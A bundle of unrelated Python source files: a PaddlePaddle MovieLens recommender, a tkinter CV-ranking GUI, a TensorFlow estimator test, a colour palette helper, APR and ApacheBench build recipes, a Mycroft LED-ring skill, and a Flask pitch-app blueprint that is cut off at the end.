    title_dict = paddle.dataset.movielens.get_movie_title_dict()
    # movie_id: 32-d embedding + 32-unit FC projection.
    movie_input = paddle.layer.data(
        name='movie_id',
        type=paddle.data_type.integer_value(
            paddle.dataset.movielens.max_movie_id() + 1))
    movie_emb = paddle.layer.embedding(input=movie_input, size=32)
    movie_fc = paddle.layer.fc(input=movie_emb, size=32)
    # category_id: sparse binary vector fed straight into an FC layer.
    category_input = paddle.layer.data(
        name='category_id',
        type=paddle.data_type.sparse_binary_vector(
            len(paddle.dataset.movielens.movie_categories())))
    category_fc = paddle.layer.fc(input=category_input, size=32)
    # movie_title: word-id sequence -> embedding -> conv pooling, which
    # yields a fixed-size temporal feature for the variable-length title.
    title_input = paddle.layer.data(
        name='movie_title',
        type=paddle.data_type.integer_value_sequence(len(title_dict)))
    title_emb = paddle.layer.embedding(input=title_input, size=32)
    title_conv = paddle.networks.sequence_conv_pool(
        input=title_emb, hidden_size=32, context_len=3)
    # Fuse all movie features into one 200-d Tanh layer.
    return paddle.layer.fc(
        input=[movie_fc, category_fc, title_conv],
        size=200,
        act=paddle.activation.Tanh())
def network_config():
    """Assemble the full training network.

    Return:
        A list [inference, cost, parameters, feeding] where
        inference -- cosine similarity of user and movie features,
        cost -- squared-error cost against the 'score' label,
        parameters -- freshly created model parameters,
        feeding -- dict mapping data-layer names to reader column indices.
    """
    user_features = get_usr_combined_features()
    movie_features = get_mov_combined_features()
    # Scaled cosine similarity between the two 200-d feature vectors.
    similarity = paddle.layer.cos_sim(
        a=user_features, b=movie_features, size=1, scale=5)
    # Mean-squared-error cost against the rating score.
    score_label = paddle.layer.data(
        name='score', type=paddle.data_type.dense_vector(1))
    training_cost = paddle.layer.square_error_cost(
        input=similarity,
        label=score_label)
    # Parameters are created from the cost's topology.
    model_parameters = paddle.parameters.create(training_cost)
    # Column index of each data layer in the reader's sample tuples.
    feeding = {
        'user_id': 0,
        'gender_id': 1,
        'age_id': 2,
        'job_id': 3,
        'movie_id': 4,
        'category_id': 5,
        'movie_title': 6,
        'score': 7
    }
    return [similarity, training_cost, model_parameters, feeding]
def plot_costs(train_costs, train_step, test_costs, test_step):
    """Plot the train/test cost curves and save them to train_test_cost.png.

    Args:
        train_costs -- training costs, recorded every 100 iterations.
        train_step -- corresponding training iteration counts.
        test_costs -- test costs, recorded once per pass.
        test_step -- corresponding test iteration counts.
    Return:
    """
    train_costs = np.squeeze(train_costs)
    test_costs = np.squeeze(test_costs)
    plt.figure()
    plt.plot(train_step, train_costs, label="Train Cost")
    plt.plot(test_step, test_costs, label="Test Cost")
    plt.ylabel('cost')
    plt.xlabel('iterations (step)')
    plt.title("train-test-cost")
    plt.legend()
    # BUG FIX: save before show(). With an interactive backend show()
    # blocks and can leave the figure empty when it returns; with Agg it
    # is a no-op either way, so saving first is always safe.
    plt.savefig('train_test_cost.png')
    plt.show()
def main():
    """
    Program entry point: define the network, train it, and save parameters.
    """
    # Initialize PaddlePaddle; GPU disabled.
    paddle.init(use_gpu=False)
    # Build the network: similarity, cost, parameters and feeding map.
    inference, cost, parameters, feeding = network_config()
    # Buffers recording cost values and iteration steps for plotting.
    train_costs = []
    test_costs = []
    train_step = []
    test_step = []
    """
    Define the model trainer with three arguments:
    cost: the cost function
    parameters: the model parameters
    update_equation: the update rule (Adam optimizer with an initial
    learning rate)
    """
    trainer = paddle.trainer.SGD(
        cost=cost,
        parameters=parameters,
        update_equation=paddle.optimizer.Adam(learning_rate=1e-4))
    # Event handling module.
    def event_handler(event):
        """
        Event handler: reacts to training-progress events.
        Args:
            event -- event object carrying event.pass_id, event.batch_id,
                     event.cost, etc.
        Return:
        """
        global LEARNING_STEP
        if isinstance(event, paddle.event.EndIteration):
            # Every 100 batches print pass id, batch id and current cost.
            if event.batch_id % 100 == 0:
                print "Pass %d Batch %d Cost %.2f" % (
                    event.pass_id, event.batch_id, event.cost)
                # Record training cost for the plot.
                train_costs.append(event.cost)
                train_step.append(LEARNING_STEP)
            LEARNING_STEP += 1
        if isinstance(event, paddle.event.EndPass):
            # Save the parameters of this pass to a tar file.
            with open('params_pass_%d.tar' % event.pass_id, 'w') as param_f:
                trainer.save_parameter_to_tar(param_f)
            # Evaluate on the test set.
            result = trainer.test(reader=paddle.batch(
                paddle.dataset.movielens.test(), batch_size=128))
            print "Test with Pass %d, Cost %f" % (
                event.pass_id, result.cost)
            # Record test cost for the plot.
            test_costs.append(result.cost)
            test_step.append(LEARNING_STEP)
    """
    Model training:
    paddle.batch(reader(), batch_size=256):
        draw batches of batch_size=256 samples from the shuffled data
        for each training iteration
    paddle.reader.shuffle(train(), buf_size=8192):
        the trainer reads buf_size=8192 samples from the train() reader
        and shuffles them
    event_handler: event callback mechanism; a custom handler can react
        to training events (the event_handler function above is used here)
    feeding:
        the feeding index map defined earlier, wiring data layers to the
        trainer
    num_passes:
        number of training passes
    """
    trainer.train(
        reader=paddle.batch(
            paddle.reader.shuffle(
                paddle.dataset.movielens.train(), buf_size=8192),
            batch_size=256),
        event_handler=event_handler,
        feeding=feeding,
        num_passes=10)
    # Show the learning curves.
    # plot_costs(train_costs, train_step, test_costs, test_step)
# Script entry point.
if __name__ == '__main__':
    main()
|
from tkinter import*
from tkinter import StringVar, ttk
from communicationInformation import communicationInformation
from CVManager import CVManager
from tkinter import filedialog
from buttonHandler import buttonHandler
class GUI:
    """Tkinter front end for the CV ranking tool.

    The user picks a directory of CVs, edits the job-requirement
    keywords, chooses a post from a combo box and runs the CVManager
    pipeline; ranked CVs are rendered as clickable buttons.
    """
    def __init__(self,root):
        # Shared state passed between the GUI and the processing code.
        self.passingInfo=communicationInformation()
        self.root=root
        # Becomes True after the first successful processing run.
        self.run=False
        # Path row: label + entry + "Add" button.
        self.frame = Frame()
        self.frame.pack(fill=X)
        self.directoryLabel = Label(self.frame,text="Path", width=10)
        self.directoryLabel.pack(side=LEFT)
        self.directoryEntry = Entry(self.frame,width=100)
        self.directoryEntry.pack(side=LEFT, padx=0,pady=10 ,expand=True)
        self.addDirectoryButton = Button(self.root, text =" Add ",command=self.pathAdd)
        self.addDirectoryButton.pack(padx=5,pady=10)
        # Holds the buttonHandler created after processing.
        self.buttonList=None
        # Job-requirements panel: label + editable keyword text box.
        self.jobReqFrame = Frame()
        self.jobReqFrame.pack(side=LEFT,fill=X)
        self.jobRequirementLabel = Label(self.jobReqFrame, text="Jobs Requirements", width=50)
        self.jobRequirementLabel.pack(expand=True, padx=5, pady=5)
        self.relevantWordsText = Text(self.jobReqFrame,width=40,height=15)
        self.relevantWordsText.pack( side=LEFT,pady=5, padx=5)
        # Pre-fill the keyword box with the default relevant words.
        self.relevantWordsText.insert('1.0',' '.join(self.passingInfo.relevantWords))
        self.CVTitleFrame=Frame()
        self.CVTitleFrame.pack(fill=X)
        self.CVTitleLabel = Label(self.CVTitleFrame, text="Selecte Post", width=50)
        self.CVTitleLabel.pack( anchor=N, padx=0, pady=0)
        self.topCVDisplay = Frame()
        self.topCVDisplay.pack(fill=X,padx=50)
        self.box_value = StringVar()
        # Read-only combo box to choose the job post to rank against.
        self.box = ttk.Combobox(self.topCVDisplay, textvariable=self.box_value,state='readonly')
        self.box['values'] = ( 'animator','webDeveloper','SoftwareDeveloper','')
        self.box.grid(column=0, row=0)
        #process button
        self.processButton = Button(self.jobReqFrame, text =" Process ",command=self.processExe)
        self.processButton.pack(side=LEFT,padx=10,pady=10)
        # "analyze" button is created only after the first successful run.
        self.analyze=None
        self.exitButton = Button(self.root, text =" Exit ",command=self.root.destroy)
        self.exitButton.pack(side=LEFT,padx=10,pady=10)
        self.manager=CVManager()
    def pathAdd(self):
        # Ask for a CV directory and drop it into the path entry.
        directoryPath=filedialog.askdirectory()
        self.directoryEntry.insert(0, directoryPath)
    def processExe(self):
        """Run the full pipeline on the first click; on later clicks only
        re-rank the already-processed CVs for the selected post."""
        if(not(self.run)):
            self.passingInfo.directoryPath=self.directoryEntry.get()
            self.passingInfo.jobSelected=self.box.get()
            # self.passingInfo.relevantWords=self.relevantWordsText.get('1.0',END).strip().split(" ")
            # if self.passingInfo.relevantWords:
            # if self.passingInfo.jobSelected:
            # if self.passingInfo.directoryPath:
            # self.passingInfo.workFlow=True
            if self.passingInfo.workFlow:
                try:
                    self.run=True
                    #print(self.passingInfo.relevantWords)
                    # Full pipeline: load, vectorize, cluster, rank, report.
                    self.manager.list_CVs(self.passingInfo.directoryPath)
                    self.manager.collectCV()
                    self.manager.findDocumentMatrix(None,self.passingInfo.relevantWords)
                    self.manager.clusterData()
                    self.manager.rankCV()
                    self.manager.showAnalytics()
                    self.manager.orderedCVList=self.manager.showTopCVPerPost(self.passingInfo.jobSelected)
                    #self.manager.compareCV()
                    # Expose the "analyze" button once results exist.
                    self.analyze = Button(self.root, text ="analyze",command=self.analyzeCV)
                    self.analyze.pack(side=LEFT,padx=10,pady=10)
                    self.createLinkToCV(self.manager.orderedCVList)
                except Exception as e:
                    print("error")
                    print("processing \t"+str(e))
            else:
                print("select all necessary info")
        else:
            try:
                # Re-rank for the currently selected post, rebuild links.
                self.passingInfo.jobSelected=self.box.get()
                self.manager.orderedCVList=self.manager.showTopCVPerPost(self.passingInfo.jobSelected)
                self.buttonList.destoringButtons()
                self.createLinkToCV(self.manager.orderedCVList)
                #self.manager.compareCV()
            except Exception as e:
                print("error")
                print("processing second time \t"+str(e))
    def createLinkToCV(self,dataList):
        # Build clickable buttons for the ranked CV list.
        self.buttonList=buttonHandler(self.root,dataList)
    def analyzeCV(self):
        # Run the deeper CV comparison on demand.
        self.manager.compareCV()
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Test for estimator loss."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
import tensorflow as tf
from tensorflow.python.platform import test
import epl
from estimator_test import capture_log
from estimator_test import input_fn
from estimator_test import model_fn
from test_utils import fix_randomness
# pylint: disable=missing-docstring,unused-variable
# pylint: disable=protected-access
class EstimatorTest(test.TestCase):
    """Checks EPL training against/with tf.distribute strategies."""

    def test_compare_with_mirrorstrategy(self):
        """Per-step losses of a 2-GPU MirroredStrategy run and an EPL
        replicate(1) run must agree to within 1e-6."""
        fix_randomness()
        log_stream = capture_log()
        model_dir = tempfile.mkdtemp()
        max_steps = 10
        seed = 123123
        batch = 2
        # Baseline: train under MirroredStrategy with a fixed seed.
        distribution_strategy = tf.contrib.distribute.MirroredStrategy(num_gpus=2)
        run_config = tf.estimator.RunConfig(train_distribute=distribution_strategy, tf_random_seed=seed,
                                            log_step_count_steps=1)
        estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
        estimator.train(lambda: input_fn(batch), max_steps=max_steps)
        logs = log_stream.getvalue()
        # Extract per-step losses from captured 'loss = ...' log lines.
        # BUG FIX: the original computed `losses` twice with different
        # parsers and immediately overwrote the first result; the dead
        # assignment has been removed.
        res1 = [line.split(':')[-1] for line in logs.strip().split('\n') if 'loss =' in line]
        losses = [float(r.split(',')[0].split()[2]) for r in res1]
        shutil.rmtree(model_dir)
        log_stream.truncate(0)
        # EPL run: same seed, plain RunConfig, replicate(1) strategy.
        fix_randomness()
        epl.init()
        epl.set_default_strategy(epl.replicate(1))
        model_dir = tempfile.mkdtemp()
        run_config = tf.estimator.RunConfig(tf_random_seed=seed, log_step_count_steps=1)
        estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
        estimator.train(lambda: input_fn(batch, False), max_steps=max_steps)
        logs = log_stream.getvalue()
        res2 = [line.split(':')[-1] for line in logs.strip().split('\n') if 'loss =' in line]
        losses2 = [float(r.split(',')[0].split()[2]) for r in res2]
        self.assertEqual(len(losses), len(losses2))
        for i, loss in enumerate(losses):
            self.assertTrue(abs(loss - losses2[i]) < 1e-6)
        shutil.rmtree(model_dir)

    def test_ignore_mirrorstrategy(self):
        """Training with MirroredStrategy should complete end-to-end.

        NOTE(review): this test parses losses but asserts nothing about
        them and never removes its temp dir -- it only verifies that
        training completes without error; consider extending it.
        """
        log_stream = capture_log()
        model_dir = tempfile.mkdtemp()
        max_steps = 10
        seed = 123123
        batch = 2
        fix_randomness()
        distribution_strategy = tf.contrib.distribute.MirroredStrategy(num_gpus=2)
        run_config = tf.estimator.RunConfig(train_distribute=distribution_strategy, tf_random_seed=seed,
                                            log_step_count_steps=1)
        estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
        estimator.train(lambda: input_fn(batch), max_steps=max_steps)
        logs = log_stream.getvalue()
        losses = [float(line.replace(',', ' ').split()[2]) for line in logs.strip().split('\n') if 'loss =' in line]
        res1 = [line.split(':')[-1] for line in logs.strip().split('\n') if 'loss =' in line]
# pylint: enable=missing-docstring,unused-variable
# pylint: enable=protected-access
# Run the test suite with INFO logging when executed directly.
if __name__ == "__main__":
    tf.logging.set_verbosity(tf.logging.INFO)
    test.main()
|
import numpy
# 100-entry RdYlGn (red -> yellow -> green) RGBA palette, channels in [0, 1].
RdYlGn = numpy.array([
    [0.64705882, 0., 0.14901961, 1.],
    [0.66243752, 0.01476355, 0.14932718, 1.],
    [0.68550557, 0.03690888, 0.14978854, 1.],
    [0.70088428, 0.05167243, 0.15009612, 1.],
    [0.72395233, 0.07381776, 0.15055748, 1.],
    [0.73933103, 0.08858131, 0.15086505, 1.],
    [0.76239908, 0.11072664, 0.15132641, 1.],
    [0.78546713, 0.13287197, 0.15178777, 1.],
    [0.80084583, 0.14763552, 0.15209535, 1.],
    [0.82391388, 0.16978085, 0.15255671, 1.],
    [0.83929258, 0.18454441, 0.15286428, 1.],
    [0.85428681, 0.21168781, 0.16370627, 1.],
    [0.86766628, 0.23983083, 0.17662438, 1.],
    [0.87658593, 0.25859285, 0.18523645, 1.],
    [0.8899654, 0.28673587, 0.19815456, 1.],
    [0.89888504, 0.30549789, 0.20676663, 1.],
    [0.91226451, 0.33364091, 0.21968474, 1.],
    [0.92118416, 0.35240292, 0.22829681, 1.],
    [0.93456363, 0.38054594, 0.24121492, 1.],
    [0.9479431, 0.40868897, 0.25413303, 1.],
    [0.95686275, 0.42745098, 0.2627451, 1.],
    [0.96101499, 0.45743945, 0.27658593, 1.],
    [0.96378316, 0.47743176, 0.28581315, 1.],
    [0.96793541, 0.50742022, 0.29965398, 1.],
    [0.97208766, 0.53740869, 0.31349481, 1.],
    [0.97485582, 0.557401, 0.32272203, 1.],
    [0.97900807, 0.58738947, 0.33656286, 1.],
    [0.98177624, 0.60738178, 0.34579008, 1.],
    [0.98592849, 0.63737024, 0.35963091, 1.],
    [0.98869666, 0.65736255, 0.36885813, 1.],
    [0.99223376, 0.68619762, 0.38362168, 1.],
    [0.99269512, 0.70926567, 0.40299885, 1.],
    [0.99300269, 0.72464437, 0.41591696, 1.],
    [0.99346405, 0.74771242, 0.43529412, 1.],
    [0.99377163, 0.76309112, 0.44821223, 1.],
    [0.99423299, 0.78615917, 0.46758939, 1.],
    [0.99469435, 0.80922722, 0.48696655, 1.],
    [0.99500192, 0.82460592, 0.49988466, 1.],
    [0.99546328, 0.84767397, 0.51926182, 1.],
    [0.99577086, 0.86305267, 0.53217993, 1.],
    [0.99623222, 0.88319877, 0.55309496, 1.],
    [0.99669358, 0.89750096, 0.57708574, 1.],
    [0.99700115, 0.90703576, 0.59307958, 1.],
    [0.99746251, 0.92133795, 0.61707036, 1.],
    [0.99777009, 0.93087274, 0.63306421, 1.],
    [0.99823145, 0.94517493, 0.65705498, 1.],
    [0.99853902, 0.95470973, 0.67304883, 1.],
    [0.99900038, 0.96901192, 0.6970396, 1.],
    [0.99946175, 0.98331411, 0.72103037, 1.],
    [0.99976932, 0.9928489, 0.73702422, 1.],
    [0.99123414, 0.99630911, 0.73702422, 1.],
    [0.97954633, 0.99138793, 0.72103037, 1.],
    [0.96201461, 0.98400615, 0.6970396, 1.],
    [0.94448289, 0.97662438, 0.67304883, 1.],
    [0.93279508, 0.97170319, 0.65705498, 1.],
    [0.91526336, 0.96432141, 0.63306421, 1.],
    [0.90357555, 0.95940023, 0.61707036, 1.],
    [0.88604383, 0.95201845, 0.59307958, 1.],
    [0.87435602, 0.94709727, 0.57708574, 1.],
    [0.8568243, 0.93971549, 0.55309496, 1.],
    [0.83529412, 0.93048827, 0.5349481, 1.],
    [0.81960784, 0.92372165, 0.52479815, 1.],
    [0.79607843, 0.9135717, 0.50957324, 1.],
    [0.78039216, 0.90680507, 0.4994233, 1.],
    [0.75686275, 0.89665513, 0.48419839, 1.],
    [0.73333333, 0.88650519, 0.46897347, 1.],
    [0.71764706, 0.87973856, 0.45882353, 1.],
    [0.69411765, 0.86958862, 0.44359862, 1.],
    [0.67843137, 0.86282199, 0.43344867, 1.],
    [0.65490196, 0.85267205, 0.41822376, 1.],
    [0.62637447, 0.8402153, 0.412995, 1.],
    [0.60668973, 0.83160323, 0.41084198, 1.],
    [0.57716263, 0.81868512, 0.40761246, 1.],
    [0.55747789, 0.81007305, 0.40545944, 1.],
    [0.52795079, 0.79715494, 0.40222991, 1.],
    [0.50826605, 0.78854287, 0.40007689, 1.],
    [0.47873895, 0.77562476, 0.39684737, 1.],
    [0.44921184, 0.76270665, 0.39361784, 1.],
    [0.4295271, 0.75409458, 0.39146482, 1.],
    [0.4, 0.74117647, 0.38823529, 1.],
    [0.37662438, 0.72979623, 0.38239139, 1.],
    [0.34156094, 0.71272587, 0.37362553, 1.],
    [0.3064975, 0.69565552, 0.36485967, 1.],
    [0.28312188, 0.68427528, 0.35901576, 1.],
    [0.24805844, 0.66720492, 0.3502499, 1.],
    [0.22468281, 0.65582468, 0.344406, 1.],
    [0.18961938, 0.63875433, 0.33564014, 1.],
    [0.16624375, 0.62737409, 0.32979623, 1.],
    [0.13118032, 0.61030373, 0.32103037, 1.],
    [0.09996155, 0.59238754, 0.31180315, 1.],
    [0.09196463, 0.57762399, 0.3041138, 1.],
    [0.07996924, 0.55547866, 0.29257978, 1.],
    [0.07197232, 0.54071511, 0.28489043, 1.],
    [0.05997693, 0.51856978, 0.2733564, 1.],
    [0.04798155, 0.49642445, 0.26182238, 1.],
    [0.03998462, 0.4816609, 0.25413303, 1.],
    [0.02798923, 0.45951557, 0.242599, 1.],
    [0.01999231, 0.44475202, 0.23490965, 1.],
    [0.00799692, 0.42260669, 0.22337562, 1.],
    [0., 0.40784314, 0.21568627, 1.]
])


def colormap(value, palette=RdYlGn):
    """Map a scalar in [0, 1] to an integer RGBA colour from `palette`.

    The value is scaled to a palette row index clamped to [0, 99]; the
    channels are scaled by 256 and truncated to int (all RGB entries are
    < 1.0, so they stay in range), while the alpha channel keeps the
    palette's own value (truncated when stored into the int array).
    """
    row = min(99, max(0, round(value * 100)))
    entry = palette[row]
    rgba = (entry * 256).astype(int)
    rgba[-1] = entry[-1]
    return rgba
|
import os
import shutil
from ..package import Package
from ..util import run, download, require_program, param_attrs
class APR(Package):
    """
    The Apache Portable Runtime.

    :identifier: apr-<version>
    :param version: version to download
    """
    def __init__(self, version: str):
        self.version = version

    def ident(self):
        # Unique identifier used for build directories and caching.
        return 'apr-' + self.version

    def fetch(self, ctx):
        # Download and unpack the source tarball into ./src.
        _fetch_and_unpack(ctx, 'apr', 'apr-' + self.version)

    def build(self, ctx):
        # Out-of-tree build in ./obj; configure only on the first build.
        # NOTE: relies on the framework resetting the cwd between steps.
        os.makedirs('obj', exist_ok=True)
        os.chdir('obj')
        if not os.path.exists('Makefile'):
            run(ctx, ['../src/configure',
                      '--prefix=' + self.path(ctx, 'install')])
        run(ctx, 'make -j%d' % ctx.jobs)

    def install(self, ctx):
        os.chdir('obj')
        run(ctx, 'make install')

    def is_fetched(self, ctx):
        return os.path.exists('src')

    def is_built(self, ctx):
        # apr-1-config is generated in obj/ by a successful build.
        return os.path.exists('obj/apr-1-config')

    def is_installed(self, ctx):
        return os.path.exists('install/bin/apr-1-config')

    def config_path(self, ctx):
        # Absolute path to the installed apr-1-config helper script,
        # consumed by dependent packages' configure flags.
        return self.path(ctx, 'install', 'bin', 'apr-1-config')
class APRUtil(Package):
    """
    The Apache Portable Runtime utilities.

    :identifier: apr-util-<version>
    :param version: version to download
    :param apr: APR package to depend on
    """
    @param_attrs
    def __init__(self, version: str, apr: APR):
        # @param_attrs stores `version` and `apr` as instance attributes.
        pass

    def dependencies(self):
        yield self.apr

    def ident(self):
        return 'apr-util-' + self.version

    def fetch(self, ctx):
        # The apr-util tarball lives in the 'apr' repo alongside APR.
        _fetch_and_unpack(ctx, 'apr', 'apr-util-' + self.version)

    def build(self, ctx):
        # Out-of-tree build in ./obj; configure only on the first build.
        os.makedirs('obj', exist_ok=True)
        os.chdir('obj')
        if not os.path.exists('Makefile'):
            run(ctx, ['../src/configure',
                      '--prefix=' + self.path(ctx, 'install'),
                      '--with-apr=' + self.apr.config_path(ctx)])
        run(ctx, 'make -j%d' % ctx.jobs)

    def install(self, ctx):
        os.chdir('obj')
        run(ctx, 'make install')

    def is_fetched(self, ctx):
        return os.path.exists('src')

    def is_built(self, ctx):
        # apu-1-config is generated in obj/ by a successful build.
        return os.path.exists('obj/apu-1-config')

    def is_installed(self, ctx):
        return os.path.exists('install/bin/apu-1-config')

    def config_path(self, ctx):
        # Installed apu-1-config helper, used by dependent packages.
        return self.path(ctx, 'install', 'bin', 'apu-1-config')
class ApacheBench(Package):
    """
    Apache's ``ab`` benchmark.

    :identifier: ab-<version>
    :param httpd_version: httpd version
    :param apr: APR package to depend on
    :param apr_util: APR utilities package to depend on
    """
    @param_attrs
    def __init__(self, httpd_version: str, apr: APR, apr_util: APRUtil):
        # @param_attrs stores all three constructor args as attributes.
        pass

    def dependencies(self):
        yield self.apr
        yield self.apr_util

    def ident(self):
        return 'ab-' + self.httpd_version

    def fetch(self, ctx):
        # ab ships inside the httpd source tree.
        _fetch_and_unpack(ctx, 'httpd', 'httpd-' + self.httpd_version)

    def build(self, ctx):
        # Configure httpd against our APR/APR-util builds, then build
        # only the `ab` tool in the support/ subdirectory.
        os.makedirs('obj', exist_ok=True)
        os.chdir('obj')
        if not os.path.exists('Makefile'):
            run(ctx, ['../src/configure',
                      '--prefix=' + self.path(ctx, 'install'),
                      '--with-apr=' + self.apr.config_path(ctx),
                      '--with-apr-util=' + self.apr_util.config_path(ctx)])
        run(ctx, 'make -C support TARGETS=ab')

    def install(self, ctx):
        # Only the single `ab` binary is installed.
        os.makedirs('install/bin', exist_ok=True)
        shutil.copy('obj/support/ab', 'install/bin')

    def is_fetched(self, ctx):
        return os.path.exists('src')

    def is_built(self, ctx):
        return os.path.exists('obj/support/ab')

    def is_installed(self, ctx):
        return os.path.exists('install/bin/ab')

    @classmethod
    def default(cls, httpd_version='2.4.41',
                apr_version='1.7.0',
                apr_util_version='1.6.1'):
        """
        Create a package with default versions for all dependencies.

        :param httpd_version: httpd version
        :param apr_version: APR version
        :param apr_util_version: APR utilities version
        """
        apr = APR(apr_version)
        apr_util = APRUtil(apr_util_version, apr)
        return cls(httpd_version, apr, apr_util)
def _fetch_and_unpack(ctx, repo, basename):
    """Download <basename>.tar.bz2 from the Apache mirror, unpack it,
    rename the extracted directory to 'src' and delete the tarball."""
    require_program(ctx, 'tar', 'required to unpack source tarfile')
    archive = basename + '.tar.bz2'
    mirror_url = 'http://apache.cs.uu.nl/%s/%s' % (repo, archive)
    download(ctx, mirror_url)
    run(ctx, ['tar', '-xf', archive])
    shutil.move(basename, 'src')
    os.remove(archive)
|
<filename>__init__.py
import time
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill, intent_handler
from adapt.intent import IntentBuilder
from mycroft.util.log import LOG
from mycroft import intent_file_handler
from apa102_pi.colorschemes import colorschemes
from apa102_pi.driver import apa102
# Number of LEDs on the ring.
NUM_LED = 12
MOSI = 23  # Hardware SPI uses BCM 10 & 11. Change these values for bit bang mode
SCLK = 24  # e.g. MOSI = 23, SCLK = 24 for Pimoroni Phat Beat or Blinkt!
class Geekworm_LED_ring(MycroftSkill):
    """Mycroft skill that drives a Geekworm APA102 LED ring, colouring the
    whole ring according to listener state (wake/think/speak/idle)."""

    def __init__(self):
        super(Geekworm_LED_ring, self).__init__(name="Geekworm_LED_ring")

    def initialize(self):
        # Called by Mycroft once the skill is fully loaded.
        self.log.info("Pixel Ring: Initializing")
        self.enable()

    def enable(self):
        """Register listener-state events and set up the LED driver."""
        self.log.info("Pixel Ring: Enabling")
        self.add_event('recognizer_loop:wakeword',
                       self.handle_listener_wakeup)
        self.add_event('recognizer_loop:record_end',
                       self.handle_listener_off)
        self.add_event('mycroft.skill.handler.start',
                       self.handle_listener_think)
        self.add_event('mycroft.skill.handler.complete',
                       self.handle_listener_off)
        self.add_event('recognizer_loop:audio_output_start',
                       self.handler_listener_speak)
        self.add_event('recognizer_loop:audio_output_end',
                       self.handle_listener_off)
        self.led = apa102.APA102(num_led=NUM_LED, order='rgb', mosi=MOSI, sclk=SCLK)
        self.led.clear_strip()
        self.led.set_global_brightness(11)

    def disable(self):
        """Deregister every event registered by enable()."""
        self.log.info("Pixel Ring: Disabling")
        # BUG FIX: enable() registers 'recognizer_loop:wakeword', not
        # 'recognizer_loop:wakeup' -- remove the event actually registered.
        self.remove_event('recognizer_loop:wakeword')
        self.remove_event('recognizer_loop:record_end')
        self.remove_event('recognizer_loop:audio_output_start')
        self.remove_event('recognizer_loop:audio_output_end')
        self.remove_event('mycroft.skill.handler.start')
        self.remove_event('mycroft.skill.handler.complete')

    def shutdown(self):
        self.log.info("Pixel Ring: Shutdown")
        # BUG FIX: the original called self.led.cleanup(led) with an
        # undefined name `led`, raising NameError on shutdown.
        self.led.cleanup()

    def _fill(self, rgb_color):
        """Set every pixel on the ring to rgb_color and latch the strip."""
        # BUG FIX: the original iterated `for self.x in range(12)`, leaking
        # the loop variable onto the instance and hard-coding the LED count.
        for pixel in range(NUM_LED):
            self.led.set_pixel_rgb(pixel, rgb_color)
        self.led.show()

    def handle_listener_wakeup(self, message):
        # Green: wake word heard, listening.
        self.log.info("Pixel Ring: Wakeup")
        self._fill(0x00FF00)

    def handle_listener_off(self, message):
        self.log.info("Pixel Ring: Off")
        self.led.clear_strip()

    def handle_listener_think(self, message):
        # Red: a skill handler is processing the utterance.
        self.log.info("Pixel Ring: Think")
        self._fill(0xFF0000)

    def handler_listener_speak(self, message):
        # Blue: audio output in progress.
        self.log.info("Pixel Ring: Speak")
        self._fill(0x0000FF)

    @intent_handler(IntentBuilder("").require("EnablePixelRing"))
    def handle_enable_pixel_ring_intent(self, message):
        self.enable()
        self.speak_dialog("EnablePixelRing")

    @intent_handler(IntentBuilder("").require("DisablePixelRing"))
    def handle_disable_pixel_ring_intent(self, message):
        self.disable()
        self.speak_dialog("DisablePixelRing")
# Factory function Mycroft calls to instantiate the skill.
def create_skill():
    return Geekworm_LED_ring()
|
from flask import Flask, render_template, url_for, request, redirect, url_for, abort
from .forms import PitchForm, UpdateProfile
from . import main
from ..models import User,Pitch
# Pitch, Comments, PitchCategory, Votes
from flask_login import login_required, current_user
from .. import db,photos
#db
# NOTE(review): this module is a blueprint (`main`), yet it creates its
# own Flask app here; routes registered on `app` below are never attached
# to the real application. Confirm intent before removing.
# HACK: hard-coded secret key; should come from configuration/env.
app = Flask(__name__)
app.config['SECRET_KEY']= 'mine101'
@main.route('/')
def index():
    """Landing page: list every pitch ordered by post time."""
    all_pitches = Pitch.query.order_by('posted').all()
    page_title = 'Welcome'
    return render_template('index.html', title=page_title, pitch=all_pitches)
#Route for adding a new pitch
#Route for adding a new pitch
@main.route('/pitch/new/<int:id>', methods=['GET', 'POST'])
@login_required
def new_pitch(id):
    """Create a new pitch owned by the current user, then go home."""
    form = PitchForm()
    if not form.validate_on_submit():
        # GET request or invalid form: show the pitch form.
        return render_template('new_pitch.html', pitch_form=form)
    pitch = Pitch(content=form.content.data, user_id=current_user.id)
    pitch.save_pitch()
    return redirect(url_for('.index'))
@main.route('/user/<uname>')
def profile(uname):
    """Show a user's profile page; 404 if the username is unknown."""
    found_user = User.query.filter_by(username=uname).first()
    if found_user is None:
        abort(404)
    return render_template("profile/profile.html", user=found_user)
@main.route('/user/<uname>/update', methods=['GET', 'POST'])
@login_required
def update_profile(uname):
    """Let a logged-in user edit their bio; 404 for unknown usernames."""
    account = User.query.filter_by(username=uname).first()
    if account is None:
        abort(404)
    form = UpdateProfile()
    if not form.validate_on_submit():
        # GET request or invalid form: render the edit form.
        return render_template('profile/update.html', form=form)
    account.bio = form.bio.data
    db.session.add(account)
    db.session.commit()
    return redirect(url_for('.profile', uname=account.username))
@main.route('/user/<uname>/update/pic',methods= ['POST'])
@login_required
def update_pic(uname):
    """Upload and set a new profile picture for `uname`.

    Saves the uploaded 'photo' file via flask-uploads and stores its
    relative path on the user record.
    """
    user = User.query.filter_by(username = uname).first()
    if user is None:
        # Consistent with profile(): unknown users get a 404 instead of
        # an AttributeError on `user.profile_pic_path` below.
        abort(404)
    if 'photo' in request.files:
        filename = photos.save(request.files['photo'])
        # BUG FIX: the saved file's name must be interpolated into the
        # stored path (it was previously a literal placeholder string).
        path = f'photos/{filename}'
        user.profile_pic_path = path
        db.session.commit()
    return redirect(url_for('main.profile',uname=uname))
@app.route("/home/")
def home():
    """Render the home page with all pitches.

    NOTE(review): this route is registered on the module-local `app`,
    not on the `main` blueprint, so it is likely dead code; confirm
    which application object should own it.
    """
    # BUG FIX: `pitchs` was referenced without ever being defined, so
